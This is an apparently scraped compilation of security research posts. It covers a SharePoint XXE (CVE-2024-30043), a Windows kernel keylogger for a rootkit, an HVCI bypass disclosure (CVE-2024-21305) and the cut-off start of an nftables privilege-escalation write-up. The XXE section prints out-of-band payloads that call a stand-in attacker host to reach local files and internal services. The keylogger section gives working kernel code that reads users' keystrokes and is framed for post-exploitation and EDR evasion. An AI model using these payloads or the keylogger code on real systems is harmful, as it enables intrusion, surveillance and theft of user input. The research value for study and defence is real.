CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD

CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD

Original text by Piotr Bazydło

Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.

So why am I writing a blog post about an XXE? I have two reasons:

·       It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user.
·       This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.

The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:

·       Read files with SharePoint Farm Service account permission.
·       Perform Server-side request forgery (SSRF) attacks.
·       Perform NTLM Relaying.
·       Achieve any other side effects to which XXE may lead.

Let us go straight to the details.

BaseXmlDataSource DataSource

Microsoft.SharePoint.WebControls.BaseXmlDataSource
 is an abstract base class, inheriting from 
DataSource
, for data source objects that can be added to a SharePoint Page. DataSource can be included in a SharePoint page, in order to retrieve data (in a way specific to a particular DataSource). When a 
BaseXmlDataSource
 is present on a page, its 
Execute
 method will be called at some point during page rendering:

protected XmlDocument Execute(string request) // [1]
{
    SPSite spsite = null;
    try
    {
        if (!BaseXmlDataSource.GetAdminSettings(out spsite).DataSourceControlEnabled)
        {
            throw new DataSourceControlDisabledException(SPResource.GetString("DataSourceControlDisabled", new object[0]));
        }
        string text = this.FetchData(request); // [2]
        if (text != null && text.Length > 0)
        {
            XmlReaderSettings xmlReaderSettings = new XmlReaderSettings();
            xmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; // [3]
            XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(text));
            XmlSecureResolver xmlResolver = new XmlSecureResolver(new XmlUrlResolver(), request); // [4]
            xmlTextReader.XmlResolver = xmlResolver; // [5]
            XmlReader xmlReader = XmlReader.Create(xmlTextReader, xmlReaderSettings); // [6]
            try
            {
                do
                {
                    xmlReader.Read(); // [7]
                }
                while (xmlReader.NodeType != XmlNodeType.Element);
            }
            ...
        }
        ...
    }
    ...
}

At 

[1]
, you can see the 
Execute
 method, which accepts a string called 
request
. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as 
DataFile
.

At this point, we can derive this method into two main parts: XML fetching and XML parsing.

       a) XML Fetching

At 

[2]
this.FetchData
 is called and our URL is passed as an input argument. 
BaseXmlDataSource
 does not implement this method (it’s an abstract class). 

FetchData
 is implemented in three classes that extend our abstract class:
• 
SoapDataSource
 — performs HTTP SOAP request and retrieves a response (XML).
• 
XmlUrlDataSource
 — performs a customizable HTTP request and retrieves a response (XML).
• 
SPXmlDataSource
 — retrieves an existing specified file on the SharePoint site. 

We will revisit those classes later.

       b) XML Parsing

At 

[3]
, the 
xmlReaderSettings.DtdProcessing
 member is set to 
DtdProcessing.Prohibit
, which should disable the processing of DTDs. 

At 

[4]
 and 
[5]
, the 
xmlTextReader.XmlResolver
 is set to a freshly created 
XmlSecureResolver
. The 
request
 string, which we fully control, is passed as the 
securityUrl
 parameter when creating the 
XmlSecureResolver

At 

[6]
, the code creates a new instance of 
XmlReader
.

Finally, it reads the contents of the XML using a while-do loop at 

[7]
.

At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our 

XmlReaderSettings
 instance is set to 
Prohibit
, which should block all DTD processing. On the other hand, we have the 
XmlResolver
 set to 
XmlSecureResolver
.

From my experience, it is very rare to see .NET code, where:
• DTDs are blocked through 

XmlReaderSettings
.
• Some 
XmlResolver
 is still defined. 

I decided to play around and sent in a general entity-based payload at some test code I wrote similar to the code shown above (I only replaced 

XmlSecureResolver
 with 
XmlUrlResolver
 for testing purposes):

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY b SYSTEM "http://attacker/poc.txt">
]>
<r>&b;</r>

As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://attacker/poc.xml">
%sp;
]>
<a>wat</a>

It was a massive surprise to me, but the HTTP request was performed! According to that, it seems that when you have .NET code where:
• 

XmlReader
 is used with 
XmlTextReader
 and 
XmlReaderSettings
.
• 
XmlReaderSettings.DtdProcessing
 is set to 
Prohibit
.
• An 
XmlTextReader.XmlResolver
 is set.

The resolver will first try to handle the parameter entities, and only afterwards will perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the Out-of-Band XXE and potentially exfiltrate data (using, for example, an HTTP channel).

The XXE is there, but we have to solve two mysteries:

• How can we properly fetch the XML payload in SharePoint?
• What’s the deal with this 

XmlSecureResolver
?

XML Fetching and XmlSecureResolver

As I have already mentioned, there are 3 classes that extend our vulnerable 

BaseXmlDataSource
. Their 
FetchData
 method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.

Let’s summarize those 3 classes:

       a) 

XmlUrlDataSource

       • Accepts URLs with a protocol set to either 

http
 or 
https
.
       • Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use.
       • Some SSRF protections are implemented. This class won’t allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space. 

       b) 

SoapDataSource

       • Almost identical to the first one, although it allows you to perform SOAP requests only (body must contain valid XML, plus additional restrictions).
       • The same SSRF protections exist as in 

XmlUrlDataSource
.

       c) 

SPXmlDataSource

       • Allows retrieval of the contents of SharePoint pages or documents. If you have a file 

test.xml
 uploaded to the 
sample
 site, you can provide a URL as follows: 
/sites/sample/test.xml
.

At this point, those HTTP-based classes look like a great match. We can:
• Create an HTTP server.
• Fetch malicious XML from our server.
• Trigger XXE and potentially read files from SharePoint server. 

Let’s test this. I’m creating an 

XmlUrlDataSource
, and I want it to fetch the XML from this URL:

       

http://attacker.com/poc.xml

poc.xml
 contains the following payload:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://localhost/test">
%sp;
]>

The plan is simple. I want to test the XXE by executing an HTTP request to the localhost (SSRF). 

We must also remember that whatever URL that we specify as our source also becomes the 

securityUrl
 of the 
XmlSecureResolver
. Accordingly, this is what will be executed:

Figure 1 XmlSecureResolver initialization

Who cares anyway? YOLO and let’s move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:

The action that failed was:
Demand
The type of the first permission that failed was:
System.Net. WebPermission
The first permission that failed was: <IPermission class="System.Net.WebPermission, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" version="1">
<ConnectAccess>
‹URI uri="http://localhost/test"/>
</ConnectAccess>
</IPermission>

Figure 2 Exception thrown during XXE->SSRF

It seems that “Secure” in 

XmlSecureResolver
 stands for something. In general, it is a wrapper around various resolvers, which allows you to apply some resource fetching restrictions. Here is a fragment of the Microsoft documentation:

“Helps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to.”

In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Let’s see a simplified example for the 

http://attacker.com/test.xml
:

Figure 3 Simplified sample restrictions applied by XmlSecureResolver

In short, it creates restrictions based on protocol, hostname, and a couple of different things (like an optional port, which is not applicable to all protocols). If we fetch our XML from 

http://attacker.com
, we won’t be able to make a request to 
http://localhost
because the host does not match.

The same goes for the protocol. If we fetch XML from the attacker’s HTTP server, we won’t be able to access local files with XXE, because neither the protocol (

http://
 versus 
file://
) nor the host match as required.

To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionalities of our SharePoint sources (such as 

XmlDataSource
). We need to figure out something else.

SPXmlDataSource and URL Parsing Issues

At this point, I was not able to abuse the HTTP-based sources. I tried to use 

SPXmlDataSource
 with the following 
request
:

       

/sites/mysite/test.xml

The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the 

http://sharepoint/sites/mysite/test.xml
document and then we:
       • Create 
SPXmlDataSource

       • Set 
DataFile
 to 
/sites/mysite/test.xml
.

SPXmlDataSource
 will successfully retrieve our XML. What about 
XmlSecureResolver
? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.

It made me wonder about the URL parsing. I knew that I could not abuse HTTP-based 

XmlDataSource
 and 
SoapDataSource
. The code was written in C# and it was pretty straightforward to read – URL parsing looked good there. On the other hand, the URL parsing of 
SPXmlDataSource
 is performed by some unmanaged code, which cannot be easily decompiled and read. 

I started thinking about a following potential exploitation scenario:
       • Delivering a “malformed” URL.
       • 

SPXmlDataSource
 somehow manages to handle this URL, and retrieves my uploaded XML successfully.
       • The URL gives me an unrestricted 
XmlSecureResolver
 policy and I’m able to fully exploit XXE.

This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when 

XmlSecureResolver
 gives us a nice policy, which allows us to:
       • Access a local file system (to read file contents).
       • Perform HTTP communication to any server (to exfiltrate data).

Let’s deliver the following URL to 

XmlSecureResolver
:

       

file://localhost/c$/whatever

Bingo! 

XmlSecureResolver
 creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access, and we can do anything we want.

Such a URL is not something that we should be able to deliver to 

SPXmlDataSource
 or any other data source that we have available. None of them is based on the local file system, and even if they were, we are not able to upload files there.

Still, we don’t know how 

SPXmlDataSource
 is handling URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:

       

file://localhost\c$/sites/mysite/test.xml

Let’s see how 

SPXmlDataSource
 handles it (based on my observations):

Figure 4 SPXmlDataSource — handling of malformed URL

This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in 

XmlSecureResolver
! This URL parsing confusion between those two components gives us the possibility to fully exploit the XXE and perform a file read.

The entire attack scenario looks like this:

Figure 5 SharePoint XXE — entire exploitation scenario

Demo

Let’s have a look at the demo, to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that:
       • 

SPXmlDataSource
 fetches the malicious XML file, even though the URL is malformed.
       • 
XmlSecureResolver
 creates an unrestricted access policy.
       • XXE is exploited and we retrieve the 
win.ini
 file.
       • “DTD prohibited” exception is eventually thrown, but we were still able to abuse the OOB XXE.

The Patch

The patch from Microsoft implemented two main changes:
       • More URL parsing controls for 

SPXmlDataSource
.
       • 
XmlTextReader
 object also prohibits DTD usage (previously, only 
XmlReaderSettings
 did that).

In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: 

XmlReaderSettings
 versus 
XmlTextReader
). When 
XmlTextReader
prohibits the DTD usage, parameter entities seem to never be resolved, even with the resolver specified (that’s how this patch works). On the other hand, when 
XmlReaderSettings
 prohibits DTDs, parameter entities are resolved when the 
XmlUrlResolver
 is used. You can easily get confused here.

Summary

A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.

I hope you liked this writeup. I have a huge line of upcoming blog posts, but vulnerabilities are waiting for the patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on TwitterMastodonLinkedIn, or Instagramfor the latest in exploit techniques and security patches.

Keylogging in the Windows Kernel with undocumented data structures

Keylogging in the Windows Kernel with undocumented data structures

Original test by eversinc33

If you are into rootkits and offensive windows kernel driver development, you have probably watched the talk Close Encounters of the Advanced Persistent Kind: Leveraging Rootkits for Post-Exploitation, by Valentina Palmiotti (@chompie1337) and Ruben Boonen (@FuzzySec), in which they talk about using rootkits for offensive operations. I do believe that rootkits are the future of post-exploitation and EDR evasion — EDR is getting tougher to evade in userland and Windows drivers are full of vulnerabilites which can be exploited to deploy rootkits. One part of this talk however particularly caught my interest: Around the 16 minute mark, Valentina talks about kernel mode keylogging. She describes the abstract process of how they achieve this in their rootkit as follows:

The basic idea revolves around 

gafAsyncKeyState
 (gaf = global af?), which is an undocumented kernel structure in 
win32kbase.sys
 used by 
NtUserGetAsyncKeyState
 (this structure exists up to Windows 10 — more on that at the end or in the talk linked above).

By first locating and then parsing this structure, we can read keystrokes the way that 

NtUserGetAsyncKeyState
 does, without calling any APIs at all.

As always, game cheaters have been ahead of the curve, since they have been battling in the kernel with anticheats for a long time. One thread explaining this technique dates back to 2019 for example.

In the talk, they also give the idea to map this memory into a usermode virtual address, to then poll this memory from a usermode process. I roughly implemented their approach, but skipped this memory mapping part, as in my rootkit Banshee (for now) I might as well read from the kernel directly. In this short post I want to give an idea about how I approached the implementation with the guideline from the talk.

Implementation

The first challenge is of course to locate 

gafAsyncKeyState
. Since the offset of 
gafAsyncKeyState
 in relation to 
win32kbase.sys
 base address is different across versions of Windows, we have to resolve it dynamically. One common technique is to look for a function that accesses it in some instruction, find that instruction and then read out the target address.

Signature scanning

We know that 

NtUserGetAsyncKeyState
 needs to access this array. We can verify this by looking at the disassembly of 
NtUserGetAsyncKeyState
 in IDA, and spot a reference to our target structure, next to a 
MOV rax qword ptr
 instruction.

This is the first 

MOV rax qword ptr
 since the beginning of the function — thus we can locate it by simply scanning for the first occurence of the bytes corresponding to that instruction (starting from the functions beginning) and reading the offset from the operand.

The 

MOV rax qword ptr
 instruction is represented in bytes as followed:

0x48 0x8B 0x05 ["32 bit offset"];

So if we find that pattern and extract the offset, we can calculate the address of our target structure 

gafAsyncKeyState
.

Code for finding such a pattern in C++ is simple. You (and I, lol) should probably write a signature scanning engine, since this is a common task in a rootkit that deals with dynamic offsets, but for now a naive implementation shall suffice. However, there is one more hurdle.

Session driver address space

If we try to access the memory of 

win32kbase
 with WinDbg attached to our kernel, we will see that (usually) we are not able to read the memory from that address.

This is because the 

win32kbase.sys
 driver is a session driver and operates in session space, a special area of system memory that is only readable through a process running in a session. This makes sense, as the keystrokes should be handled different for every user that has a session connected.

Thus, to access this memory, we will first have to attach to a process running in the target session. In WinDbg, this is possible with the 

!session
command. In our driver, we will have to call 
KeStackAttachProcess
, and afterwards, 
KeUnstackDetachProcess
.

A common process to choose is 

winlogon.exe
, as you can be sure it is always running and attached to a session. Another common choice seems to be 
csrss.exe
, but make sure to choose the right one, as only one of the two commonly running instances runs in a session context.

Putting it all together, here we have simple code to resolve the address of 

gafAsyncKeyState
. Error handling is omitted for brevity, and some functions (e.g. 
GetSystemRoutineAddress
LOG_MSG
 or 
GetPidFromProcessName
 are own implementations, but should be trivial to recreate and self-explanatory. Else you can look them up in Banshee):

PVOID Resolve_gafAsyncKeyState()
{
    KAPC_STATE apc;
    PVOID address = 0;
    PEPROCESS targetProc = 0;

    // Resolve winlogon's PID
    UNICODE_STRING processName;
    RtlInitUnicodeString(&processName, L"winlogon.exe");
    HANDLE procId = GetPidFromProcessName(processName); 
    PsLookupProcessByProcessId(procId, &targetProc);
        
    // Get Address of NtUserGetAsyncKeyState
    DWORD64 ntUserGetAsyncKeyState = (DWORD64)GetSystemRoutineAddress(Win32kBase, "NtUserGetAsyncKeyState");

    // Attach to winlogon.exe to enable reading of session space memory
    KeStackAttachProcess(targetProc, &apc);

    // Starting from NtUserGetAsyncKeyState, look for our byte signature
    for (INT i=0; i < 500; ++i)
    {
        if (
            *(BYTE*)(ntUserGetAsyncKeyState + i)     == 0x48 &&
            *(BYTE*)(ntUserGetAsyncKeyState + i + 1) == 0x8b &&
            *(BYTE*)(ntUserGetAsyncKeyState + i + 2) == 0x05
        )
        {
            // MOV rax qword ptr instruction found!
            // The 32bit param is the offset from the next instruction to the address of gafAsyncKeyState
            UINT32 offset = (*(PUINT32)(ntUserGetAsyncKeyState + i + 3));
            // Calculate the address: the address of NtUserGetAsyncKeyState + our current offset while scanning + 4 bytes for the 32bit parameter itself + the offset parsed from the parameter = our target address
            address = (PVOID)(ntUserGetAsyncKeyState + (i + 3) + 4 + offset); 
            break;
        }
    }

    LOG_MSG("Found address to gafAsyncKeyState at offset [NtUserGetAsyncKeyState]+%i: 0x%llx\n", i, address);

    // Detach from the process
    KeUnstackDetachProcess(&apc);
    
    ObDereferenceObject(targetProc);
    return address;
}

With the address of our structure of interest, we now just need to find out how we can parse it.

Parsing keystrokes

While I first started to reverse engineer 

NtUserGetAsyncKeyState
 in Ghidra, it came to my mind that folks way smarter than me already did that, and looked up the function in ReactOS.

Here, we can see how this function simply accesses the 

gafAsyncKeyState
 array with the 
IS_KEY_DOWN
 macro, to determine if a key is pressed, according to its Virtual Key-Code.

The 

IS_KEY_DOWN
 macro simply checks if the bit corresponding to the virtual key-code is set and returns 
TRUE
 if it is. So our structure, 
gafAsyncKeyState
, is simply an array of bits that correspond to the states of our keys.

All that is left now is to copy and paste these macros and implement some basic polling logic (what key is down, was it down last time, …).

// https://github.com/mirror/reactos/blob/c6d2b35ffc91e09f50dfb214ea58237509329d6b/reactos/win32ss/user/ntuser/input.h#L91
#define GET_KS_BYTE(vk) ((vk) * 2 / 8)
#define GET_KS_DOWN_BIT(vk) (1 << (((vk) % 4)*2))
#define GET_KS_LOCK_BIT(vk) (1 << (((vk) % 4)*2 + 1))
#define IS_KEY_DOWN(ks, vk) (((ks)[GET_KS_BYTE(vk)] & GET_KS_DOWN_BIT(vk)) ? TRUE : FALSE)
#define SET_KEY_DOWN(ks, vk, down) (ks)[GET_KS_BYTE(vk)] = ((down) ? \
                                                            ((ks)[GET_KS_BYTE(vk)] | GET_KS_DOWN_BIT(vk)) : \
                                                            ((ks)[GET_KS_BYTE(vk)] & ~GET_KS_DOWN_BIT(vk)))

UINT8 keyStateMap[64] = { 0 };
UINT8 keyPreviousStateMap[64] = { 0 };
UINT8 keyRecentStateMap[64] = { 0 };

VOID UpdateKeyStateMap(const HANDLE& procId, const PVOID& gafAsyncKeyStateAddr)
{
    // Save the previous state of the keys
    memcpy(keyPreviousStateMap, keyStateMap, 64);

    // Copy over the array into our buffer
    SIZE_T size = 0;
    MmCopyVirtualMemory(
        BeGetEprocessByPid(HandleToULong(procId)),
        gafAsyncKeyStateAddr,
        PsGetCurrentProcess(), 
        &keyStateMap,
        sizeof(UINT8[64]),
        KernelMode,
        &size
    );

    // for each keycode ...
    for (auto vk = 0u; vk < 256; ++vk) 
    {
        // ... if key is down but wasn't previously, set it in the recent-state-map as down
        if (IS_KEY_DOWN(keyStateMap, vk) && !(IS_KEY_DOWN(keyPreviousStateMap, vk)))
        {
            SET_KEY_DOWN(keyRecentStateMap, vk, TRUE);
        }
    }
}

BOOLEAN
WasKeyPressed(UINT8 vk)
{
    // Check if a key was pressed since last polling the key state
    BOOLEAN result = IS_KEY_DOWN(keyRecentStateMap, vk);
    SET_KEY_DOWN(keyRecentStateMap, vk, FALSE);
    return result;
}
    

Then, we can call 

WasKeyPressed
 at a regular interval to poll for keystrokes and process them in any way we like:

#define VK_A 0x41

VOID KeyLoggerFunction()
{
    while (true)
    {
        BeUpdateKeyStateMap(procId, gasAsyncKeyStateAddr);

        // POC: just check if A is pressed
        if (BeWasKeyPressed(VK_A))
        {
            LOG_MSG("A pressed\n");
        }

        // Sleep for 0.1 seconds
        LARGE_INTEGER interval;
        interval.QuadPart = -1 * (LONGLONG)100 * 10000; 
        KeDelayExecutionThread(KernelMode, FALSE, &interval);
    }
}

Logging a keystroke to the kernel debug log works as a simple PoC for the technique — whenever the 

A
 key is pressed, we get a debug log in WinDbg.

You can read the messy code at https://github.com/eversinc33/Banshee.

Some more things to do or look out for are:

  • Implement it for Windows >= 11 — the structure is the same, it just is named different and needs to be dereferenced a few times to reach the array
  • If you are interested, go with the approach mentioned by Valentina, with mapping the structure into usermode to read it from there

Happy Hacking!

Hunting down the HVCI bug in UEFI

Hunting down the HVCI bug in UEFI

Original text by Satoshi’s notes


This post was coauthored with Andrea Allievi (@aall86), a Windows Core OS engineer who analyzed and fixed the issue.


This post details the story and technical details of the non-secure Hypervisor-Protected Code Integrity (HVCI) configuration vulnerability disclosed and fixed with the January 9th update on Windows. This vulnerability, CVE-2024-21305, allowed arbitrary kernel-mode code execution, effectively bypassing HVCI within the root partition.

While analysis of the HVCI bypass bug alone can be interesting enough, I and Andrea found that the process of root causing and fixing it would also be fun to detail and decided to write this up together. The first half of this article was authored by me, and the second half was by Andrea. Readers can expect a great deal of Windows internals and x64 architecture details thanks to Andrea’s contribution!

Discovery to reporting

Discovery

The discovery of the bug was one of the by-products of hvext.js, the Windbg extension for studying the implementation of Hyper-V on Intel processors. With the extension, I dumped EPT on a few devices to better understand the implementation of HVCI, and one of them showed readable, writable, and kernel-mode executable (later referred to as RWX) guest physical addresses (GPAs). When HVCI is enabled, such GPAs should not exist as it would allow generation and execution of arbitrary code in kernel-mode. Eventually, out of 7 Intel devices I had, I found 3 devices with this issue, ranging from 6th to 10th generation processors.

Exploitation

Exploiting this issue for a verification purpose was trivial as the RWX GPAs did not change across reboot or when test-signing was enabled. I wrote the driver that remapped a choice of linear address onto one of RWX GPAs and placed shellcode there, and was able to execute the shellcode as expected! If HVCI were working as intended, the PoC driver would have failed to write shellcode and caused a bug check. For more details on the PoC, see the report on GitHub.

I asked Andrea about this and was told it could be a legit issue.

Partial root causing

I was curious why the issue was seen on only some devices and started to investigate what the RWX GPAs were.

Contents of those GPAs all seemed zero during runtime, and RamMap indicated it was outside NTOS-managed memory. I dumped memory during the Winload debug session, but they were still vastly zero. It was the same even during the UEFI shell phase.

At this point, I thought it might be UEFI-reserved regions. First, I realized that the RWX GPAs were parts of Reserved regions but did not exactly match, per the output of the 

memmap
 UEFI shell command. Shortly after, I discovered the regions exactly corresponded to the ranges reported by the Reserved Memory Region Reporting (RMRR) structure in the DMAR ACPI table.

I spent more time trying to understand why they were marked as RWX and why it occurred on only some machines. Eventually, I could not get the answers, but I was already reasonably satisfied with my findings and decided to hand this over to MSFT.

Reporting

I sent an initial write-up to Andrea, then, an updated one to MSRC a few days later. Though, it turned out that Andrea was the engineer in charge of this case. Such a small world.

Nothing much happened until mid-October when Andrea privately let me know he root caused and fixed it, and also offered to write up technical details from his perspective.

So the following is his write-up with a lot of technical details!

Technical details and fixes

Intel VT-x and its limitation

So what is the DMAR table and why was important in this bug?

To understand it we should take a step back and briefly introduce one of the first improvements of the Intel Virtualization Extension (Intel VT-x). Indeed, Intel VT-x was introduced back around the year 2004 and, in its initial implementation, it misses some parts of the technology that are currently used in modern Operating Systems (in 2023). In particular:

  1. The specifications did not include a hardware Stage-2 MMU able to perform the translation of the Guest physical addresses (GPAs) to System physical addresses (SPAs). First Hypervisors (like VmWare) were using a technique calling Memory Shadowing
  2. Similarly, the specification did not protect devices performing DMA to system memory addresses.

As the reader can imagine, this was not compatible with the Security standard required nowadays, so multiple “addendums” were added at the first implementation. While in this article we are not talking about #1 (plenty of articles are available online, like this one), we will give a short introduction and description of the Intel VT-d technology, which aims at protecting Device data transfer initiated via DMA.

Intel VT-d

Intel maintains the VT-d technology specifications at the following URL: https://www.intel.com/content/www/us/en/content-details/774206/intel-virtualization-technology-for-directed-i-o-architecture-specification.html

The document is updated quite often (at the time of this writing, we are at revision 4.1) and explains how an I/O memory management unit (IOMMU) can now protect devices to access memory that belongs to another VM or is reserved for the the host Hypervisor or OS.

A device can be exposed by the Hypervisor in different ways:

  • Emulated devices always cause a VMEXIT and they are emulated by a component in the Virtualization stack.
  • Paravirtualized devices are synthetic devices that communicate with the host device through a technology implemented in the Host Hypervisor (VmBus in case of HyperV).
  • Hardware accelerated devices are mapped directly in the VM. (readers who want to know more can check Chapter 9 of the Windows Internals book).

All the hardware devices are directly mapped in the root partition by the HV. To correctly support Hardware accelerated devices in a child VM the HV needs an IOMMU. But what exactly is an IOMMU? To be able to isolate and restrict device accesses to just the resource owned by the VM (or by the root partition), an IOMMU should provide the following capabilities:

  • I/O device assignment
  • DMA remapping to support address translations for Direct Memory Accesses (DMA) initiated by the devices
  • Interrupt remapping and posting for supporting isolation and routing of interrupts to the appropriate VM

DMA remapping

The DMA remapping capability is the feature related to the bug found in the Hypervisor. Indeed, to properly isolate DMA requests coming from hardware devices, an IOMMU must translate request coming from the endpoint device attached to the Root Complex (which, in its simplest form, a DMA request is composed of a target DMA address/size and originating device ID specified as Bus/Dev/Function — BDF) to its corresponding Host Physical Address (HPA).

Note that readers that do not know what a Root Complex is or how the PCI-Ex devices interact with the system memory bus can read the excellent article by Gbps located here (he told me that a part 2 is coming soon 🙂 ).

The IOMMU defines the Domain concept, such an isolated environment in the platform for which a subset of host physical memory is allocated (basically a bunch of isolated physical memory pages). The isolation property of a domain is achieved by blocking access to its physical memory from resources not assigned to it. Software creates and manages domains, allocates the backing physical memory (SPAs), and sets up the DMA address translation function using “Device-to-Domain Mapping” and “Hierarchical Address translation” structures.

Skipping a lot of details, both structures can be thought as “Special” page tables:

  • Device–to-Domain Mapping structures are addressed by the BDF of the source device. In the Intel manual this is called “Source ID” and yield backs the domain ID and the root Address Translation structures for the domain (yes, entries in this table are 128 bits indeed, and not 64).
  • Hierarchical Address translation structures are addressed by the source DMA address, which is treated as GPA, and outputs the final Host Physical address used as target for the DMA transfer.

The concepts above are described by the following figure (source: Intel Manual):

DMAR ACPI table and RMRR structure

The architecture defines that any IOMMU present in the system must be detected by the BIOS and announced via an ACPI table, called DMA Remapping Reporting (DMAR). The DMAR is composed of multiple remapping structures. For example, an IOMMU is reported with the DMA Remapping Unit Definition (DRHD) structure. Describing all of them is beyond the scope of this article.

What if a device always needs to perform DMA transfer with specific memory regions? Certain devices, like the Network controller, when used for debugging (for example in KDNET), or the USB controller, when used for legacy Keyboard emulation in the BIOS, should always be able to perform DMA both before and after setting up IOMMU. For these kinds of devices, the Reserved Memory Region Reporting (RMRR) structure is used by the BIOS to describe regions of memory where the DMA should always be possible.

Two important concepts described in the Intel manual regarding the RMRR structure:

  1. The BIOS should report physical memory described in the RMRR as Reserved in the UEFI memory map.
  2. When the OS enables DMA remapping, it should set up the Second-stage address translation structures for mapping the physical memory described by the RMRR using the “identity mapping” with read and write (RW) permission (meaning that GPA X is mapped to HPA X).

Interaction with Windows, and the bug

In some buggy machines, consideration #1 was not happening, meaning that neither the HV nor the Secure Kernel know about this memory range from the UEFI memory map.

When booting, the Hypervisor initializes its internal state, creates the Root partition (again, details are in the Windows Internals book) and performs the IOMMU initialization in multiple phases. On AMD64 machines, one of these phases requires parsing the RMRR. Note that the HV still has no idea whether the system will enable VBS/HVCI or not, so it has no options other than applying the full identity mapping to the range (which implies RWX protection).

When the Secure Kernel later starts and determines that HVCI should be enabled, it will set the new “default VTL permission” to be RW (but not Execute) and will inform the hypervisor by setting the public HvRegisterVsmPartitionConfig synthetic MSR (documented in the Hypervisor TLFS). When VTL 1 of the target partition sets the default VTL protection and writes to the HvRegisterVsmPartitionConfig MSR, it causes a VMEXIT to the Hypervisor, which cycles between each valid Guest physical frame described in the UEFI memory map and mapped in the VTL 0 SLAT, removing the “Execute” permission bit (as dictated by the “DefaultVtlProtectionMask” field of the synthetic register).

Mindful readers can already understand what is going wrong here. In buggy firmware, where the RMRR is not set in the UEFI memory map, leaves the “Execute” protection of the described region on, producing a HVCI violation (thanks Satoshi).

Fixes

MSFT has fixed (thanks Andrea) the issue working on two separate sides:

  1. Fixing the firmware in all the commercial devices MSFT released, forcing the RMRR memory region to be included in the UEFI memory map
  2. Implementing a trick in the HV. Since the architecture requires that the RMRR memory region must be mapped in the IOMMU (via the Hierarchical Address translation structures as described above) using identity map with RW access permission (but no X — Execute), we decided to perform some compatibility tests and see what happen if the HV protects all the initial PFNs for RMRR memory regions in the SLAT by stripping the X bit. Indeed, the OS always needs to read or write to those regions, so programming the SLAT is needed.

Tests for fix 2 worked and produced almost 0 compatibility issue, so MSFT decided also to increase the protection and remove the X permission on all RMRR memory region by default on ALL systems, also increasing the protection when the firmware is bugged.

Summary

Hope you enjoyed this jointly written post with both bug reporter’s and developer’s perspectives and a great deal of details on the interaction of VT-d and Hyper-V by Andrea.

To summarize, the combination of buggy UEFI that did not follow one of the requirements by the Intel VT-d specification and permissive default EPT configuration caused unintended RWX GPAs under HVCI. MSFT resolved the issue by correcting the default permission and their UEFI and released the fix on January 9. Not all devices are vulnerable to this issue. However, you may identify vulnerable devices by checking the 

memmap
 UEFI shell command not showing the exact RMRR memory regions as Reserved.

This repo contains the report and PoC of CVE-2024-21305, the non-secure Hypervisor-Protected Code Integrity (HVCI) configuration vulnerability. This vulnerability allowed arbitrary kernel-mode code execution, effectively bypassing HVCI, within the root partition. For the root cause, read the blog post coauthored with Andrea Allievi (@aall86), a Windows Core OS engineer who analyzed and fixed the issue.

The report in this repo is what I sent to MSRC, which contains the PoC and an initial analysis of the issue.

CVE-2024-21305

64 bytes and a ROP chain – A journey through nftables

64 bytes and a ROP chain – A journey through nftables

Original text by di Davide Ornaghi

The purpose of this article is to dive into the process of vulnerability research in the Linux kernel through my experience that led to the finding of CVE-2023-0179 and a fully functional Local Privilege Escalation (LPE).
By the end of this post, the reader should be more comfortable interacting with the nftables component and approaching the new mitigations encountered while exploiting the kernel stack from the network context.

1. Context

As a fresh X user indefinitely scrolling through my feed, one day I noticed a tweet about a Netfilter Use-after-Free vulnerability. Not being at all familiar with Linux exploitation, I couldn’t understand much at first, but it reminded me of some concepts I used to study for my thesis, such as kalloc zones and mach_msg spraying on iOS, which got me curious enough to explore even more writeups.

